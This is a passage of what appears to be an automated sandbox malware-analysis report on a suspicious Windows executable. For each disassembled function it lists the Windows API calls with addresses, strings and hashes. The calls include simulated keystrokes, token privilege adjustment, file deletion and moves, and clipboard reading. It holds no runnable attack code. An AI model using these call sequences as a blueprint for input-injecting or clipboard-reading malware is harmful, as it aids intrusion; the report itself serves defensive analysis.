                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F4FA16
                                                                                        • GetKeyState.USER32(00000010), ref: 00F4FA20
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F4FA4F
                                                                                        • SendMessageW.USER32 ref: 00F4FA72
                                                                                        • SendMessageW.USER32(?,00001030,?,00F4E059), ref: 00F4FB6F
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00F4FB85
                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F4FB96
                                                                                        • SetCapture.USER32(?), ref: 00F4FB9F
                                                                                        • ClientToScreen.USER32(?,?), ref: 00F4FC03
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F4FC0F
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00F4FC29
                                                                                        • ReleaseCapture.USER32 ref: 00F4FC34
                                                                                        • GetCursorPos.USER32(?), ref: 00F4FC69
                                                                                        • ScreenToClient.USER32(?,?), ref: 00F4FC76
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F4FCD8
                                                                                        • SendMessageW.USER32 ref: 00F4FD02
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F4FD41
                                                                                        • SendMessageW.USER32 ref: 00F4FD6C
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F4FD84
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F4FD8F
                                                                                        • GetCursorPos.USER32(?), ref: 00F4FDB0
                                                                                        • ScreenToClient.USER32(?,?), ref: 00F4FDBD
                                                                                        • GetParent.USER32(?), ref: 00F4FDD9
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F4FE3F
                                                                                        • SendMessageW.USER32 ref: 00F4FE6F
                                                                                        • ClientToScreen.USER32(?,?), ref: 00F4FEC5
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F4FEF1
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F4FF19
                                                                                        • SendMessageW.USER32 ref: 00F4FF3C
                                                                                        • ClientToScreen.USER32(?,?), ref: 00F4FF86
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F4FFB6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F5004B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$F
                                                                                        • API String ID: 2516578528-4164748364
                                                                                        • Opcode ID: 668f52426cdfe5074ad72795f09e37f1205e54d5712615bc64bd1eb88f18b11e
                                                                                        • Instruction ID: 282b28e132f735181092b9a7ff253102b8611008d90041771580ee5b94b40e51
                                                                                        • Opcode Fuzzy Hash: 668f52426cdfe5074ad72795f09e37f1205e54d5712615bc64bd1eb88f18b11e
                                                                                        • Instruction Fuzzy Hash: AA32AE74A04249EFDB10CF64CC84BAABBE4FF49364F140629FA598B2A1C771DC49EB51
                                                                                        Function 00F4AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F4B1CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: %d/%02d/%02d
                                                                                        • API String ID: 3850602802-328681919
                                                                                        • Opcode ID: 1deaa2ab63d65d92cde0b9556ed0928fc109913e25072309559262831d99cf72
                                                                                        • Instruction ID: da83436f478cae202bdc4126b71553a2244193f20ae963a4a06a7e794fe586b9
                                                                                        • Opcode Fuzzy Hash: 1deaa2ab63d65d92cde0b9556ed0928fc109913e25072309559262831d99cf72
                                                                                        • Instruction Fuzzy Hash: 4112BF71A40208ABEB248F65CC59FAA7FB8FF85320F104159F916EA2D1DBB5D901EB11
                                                                                        Function 00EFEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00EFEB4A
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F53AEA
                                                                                        • IsIconic.USER32(000000FF), ref: 00F53AF3
                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00F53B00
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00F53B0A
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F53B20
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F53B27
                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00F53B33
                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F53B44
                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F53B4C
                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F53B54
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00F53B57
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F53B6C
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00F53B77
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F53B81
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00F53B86
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F53B8F
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00F53B94
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F53B9E
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00F53BA3
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00F53BA6
                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00F53BCD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 4125248594-2988720461
                                                                                        • Opcode ID: 0458b9a612bdaafc8f46667561f1338599abdc2e5ff5f8cec57c94bdc4023335
                                                                                        • Instruction ID: 37ee82c46d2b0b42c4f1d954c81695e7027e3a194436da0928af50afa2499b46
                                                                                        • Opcode Fuzzy Hash: 0458b9a612bdaafc8f46667561f1338599abdc2e5ff5f8cec57c94bdc4023335
                                                                                        • Instruction Fuzzy Hash: 773152B2F4021C7BEB215B658C49F7E7E6CEB84B91F144015FA05EA1D1D6F15D00BAA1
                                                                                        Function 00F1ACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F1B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1B180
                                                                                          • Part of subcall function 00F1B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F1B1AD
                                                                                          • Part of subcall function 00F1B134: GetLastError.KERNEL32 ref: 00F1B1BA
                                                                                        • _memset.LIBCMT ref: 00F1AD08
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F1AD5A
                                                                                        • CloseHandle.KERNEL32(?), ref: 00F1AD6B
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F1AD82
                                                                                        • GetProcessWindowStation.USER32 ref: 00F1AD9B
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00F1ADA5
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F1ADBF
                                                                                          • Part of subcall function 00F1AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F1ACC0), ref: 00F1AB99
                                                                                          • Part of subcall function 00F1AB84: CloseHandle.KERNEL32(?,?,00F1ACC0), ref: 00F1ABAB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                        • String ID: $default$winsta0
                                                                                        • API String ID: 2063423040-1027155976
                                                                                        • Opcode ID: ee7955abd1688e7028be2f69c0d384d34c0924e88a02963c928986590bfc38d2
                                                                                        • Instruction ID: e0e9cbc95ddbd8a5e1c424299d5ec003be1bb2865e4e1d3412f89eff05acf1db
                                                                                        • Opcode Fuzzy Hash: ee7955abd1688e7028be2f69c0d384d34c0924e88a02963c928986590bfc38d2
                                                                                        • Instruction Fuzzy Hash: CE819B71D0120DAFDF11DFA5CC49AEE7BB8EF08314F044119F824A6161DB758E95EB62
                                                                                        Function 00F260DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F26EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F25FA6,?), ref: 00F26ED8
                                                                                          • Part of subcall function 00F26EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F25FA6,?), ref: 00F26EF1
                                                                                          • Part of subcall function 00F2725E: __wsplitpath.LIBCMT ref: 00F2727B
                                                                                          • Part of subcall function 00F2725E: __wsplitpath.LIBCMT ref: 00F2728E
                                                                                          • Part of subcall function 00F272CB: GetFileAttributesW.KERNEL32(?,00F26019), ref: 00F272CC
                                                                                        • _wcscat.LIBCMT ref: 00F26149
                                                                                        • _wcscat.LIBCMT ref: 00F26167
                                                                                        • __wsplitpath.LIBCMT ref: 00F2618E
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F261A4
                                                                                        • _wcscpy.LIBCMT ref: 00F26209
                                                                                        • _wcscat.LIBCMT ref: 00F2621C
                                                                                        • _wcscat.LIBCMT ref: 00F2622F
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00F2625D
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F2626E
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F26289
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F26298
                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00F262AD
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F262BE
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F262E1
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F262FD
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F2630B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                        • String ID: \*.*$p1#v`K$v
                                                                                        • API String ID: 1917200108-1732502266
                                                                                        • Opcode ID: 75e3daddc92755cd0bf75a4c84af2ab52c7c9d6dcbd24bdecd40cdcffc31e8dd
                                                                                        • Instruction ID: 37e865f3cc11f9d712f1673fcd94845ef69cd3fbcb991f24d4d4708690bdf477
                                                                                        • Opcode Fuzzy Hash: 75e3daddc92755cd0bf75a4c84af2ab52c7c9d6dcbd24bdecd40cdcffc31e8dd
                                                                                        • Instruction Fuzzy Hash: B3514072D0812CAACF21EB91DC44EEB77BCAF05310F0501EAE555E3141DE769749AFA4
                                                                                        Function 00F36B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(00F7DC00), ref: 00F36B36
                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F36B44
                                                                                        • GetClipboardData.USER32(0000000D), ref: 00F36B4C
                                                                                        • CloseClipboard.USER32 ref: 00F36B58
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F36B74
                                                                                        • CloseClipboard.USER32 ref: 00F36B7E
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F36B93
                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00F36BA0
                                                                                        • GetClipboardData.USER32(00000001), ref: 00F36BA8
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F36BB5
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F36BE9
                                                                                        • CloseClipboard.USER32 ref: 00F36CF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                        • String ID:
                                                                                        • API String ID: 3222323430-0
                                                                                        • Opcode ID: 9af580d07c0159d43a875c5f83a92fc2974c1b9fabf4ef843f64758c7faa10bc
                                                                                        • Instruction ID: fd0d1ddd63bf6265d0c63cb6669a76f656889d57faa60e9c5cdf68988ab4730a
                                                                                        • Opcode Fuzzy Hash: 9af580d07c0159d43a875c5f83a92fc2974c1b9fabf4ef843f64758c7faa10bc
                                                                                        • Instruction Fuzzy Hash: 9851C371700209ABD300EF65DD56F6E77B8EF84B61F004429F656E61E1DFB0D805AB62
                                                                                        Function 00F2F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F2F62B
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F2F67F
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F2F6A4
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F2F6BB
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F2F6E2
                                                                                        • __swprintf.LIBCMT ref: 00F2F72E
                                                                                        • __swprintf.LIBCMT ref: 00F2F767
                                                                                        • __swprintf.LIBCMT ref: 00F2F7BB
                                                                                          • Part of subcall function 00F0172B: __woutput_l.LIBCMT ref: 00F01784
                                                                                        • __swprintf.LIBCMT ref: 00F2F809
                                                                                        • __swprintf.LIBCMT ref: 00F2F858
                                                                                        • __swprintf.LIBCMT ref: 00F2F8A7
                                                                                        • __swprintf.LIBCMT ref: 00F2F8F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 835046349-2428617273
                                                                                        • Opcode ID: ace4ffa17f53fc7ddd47cd8e85451896828c455893bd4cc22f2c10e61d082784
                                                                                        • Instruction ID: c5832943c2bb1ecafe2117d814d61358b36e0157443afce18a92fc93aca309ed
                                                                                        • Opcode Fuzzy Hash: ace4ffa17f53fc7ddd47cd8e85451896828c455893bd4cc22f2c10e61d082784
                                                                                        • Instruction Fuzzy Hash: 8AA11EB2508344ABC310EB95CC85DAFB7ECAF98700F40182EF69593192EB74D949D762
                                                                                        Function 00F31B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F31B50
                                                                                        • _wcscmp.LIBCMT ref: 00F31B65
                                                                                        • _wcscmp.LIBCMT ref: 00F31B7C
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00F31B8E
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00F31BA8
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00F31BC0
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F31BCB
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00F31BE7
                                                                                        • _wcscmp.LIBCMT ref: 00F31C0E
                                                                                        • _wcscmp.LIBCMT ref: 00F31C25
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F31C37
                                                                                        • SetCurrentDirectoryW.KERNEL32(00F939FC), ref: 00F31C55
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F31C5F
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F31C6C
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F31C7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1803514871-438819550
                                                                                        • Opcode ID: c8307dcb0e508b75b385f104d621038d2365ed4ebc0e6692a5a3661f7b7033ee
                                                                                        • Instruction ID: dab7d9e874eae0a20cc1e08976529a144c1aa92d3abebece0dcadbaf681f3c19
                                                                                        • Opcode Fuzzy Hash: c8307dcb0e508b75b385f104d621038d2365ed4ebc0e6692a5a3661f7b7033ee
                                                                                        • Instruction Fuzzy Hash: A031D332A002196FDF14AFA1DC49AEE77ACBF49370F144156E811E3090EBB4DE45AA64
                                                                                        Function 00F31C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F31CAB
                                                                                        • _wcscmp.LIBCMT ref: 00F31CC0
                                                                                        • _wcscmp.LIBCMT ref: 00F31CD7
                                                                                          • Part of subcall function 00F26BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F26BEF
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00F31D06
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F31D11
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00F31D2D
                                                                                        • _wcscmp.LIBCMT ref: 00F31D54
                                                                                        • _wcscmp.LIBCMT ref: 00F31D6B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F31D7D
                                                                                        • SetCurrentDirectoryW.KERNEL32(00F939FC), ref: 00F31D9B
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F31DA5
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F31DB2
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F31DC2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1824444939-438819550
                                                                                        • Opcode ID: f7d1d41ce5b4fe525b6b2ba5e7cc0734de81a60d98c534dac7b5281e97119698
                                                                                        • Instruction ID: 9edc68aaabbd621e7ac1aca98606dfa9d5b5495fa3fd931507d605c9902e10b3
                                                                                        • Opcode Fuzzy Hash: f7d1d41ce5b4fe525b6b2ba5e7cc0734de81a60d98c534dac7b5281e97119698
                                                                                        • Instruction Fuzzy Hash: 1631E432A0061EAADF24AFA0DC09AEE77ADBF46330F144551E811A3090DBB4DE45FB64
                                                                                        Function 00EE7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset
                                                                                        • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                        • API String ID: 2102423945-2023335898
                                                                                        • Opcode ID: 1051fa03f4e0de1840acac326af61ca679e26a82b508f0203a7fe5826c9efd4d
                                                                                        • Instruction ID: 9f1174cc5833db231e0f188a663c25ebf6f2e3312d0dd72abebd7d8f344b9e05
                                                                                        • Opcode Fuzzy Hash: 1051fa03f4e0de1840acac326af61ca679e26a82b508f0203a7fe5826c9efd4d
                                                                                        • Instruction Fuzzy Hash: 1682D071D04259DBCF24CF95C8806EDBBB1BF44324F2481AAD959BB351E7349E89DB80
                                                                                        Function 00F3091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 00F309DF
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F309EF
                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F309FB
                                                                                        • __wsplitpath.LIBCMT ref: 00F30A59
                                                                                        • _wcscat.LIBCMT ref: 00F30A71
                                                                                        • _wcscat.LIBCMT ref: 00F30A83
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F30A98
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F30AAC
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F30ADE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F30AFF
                                                                                        • _wcscpy.LIBCMT ref: 00F30B0B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F30B4A
                                                                                        Strings
                                                                                        Memory Dump Source
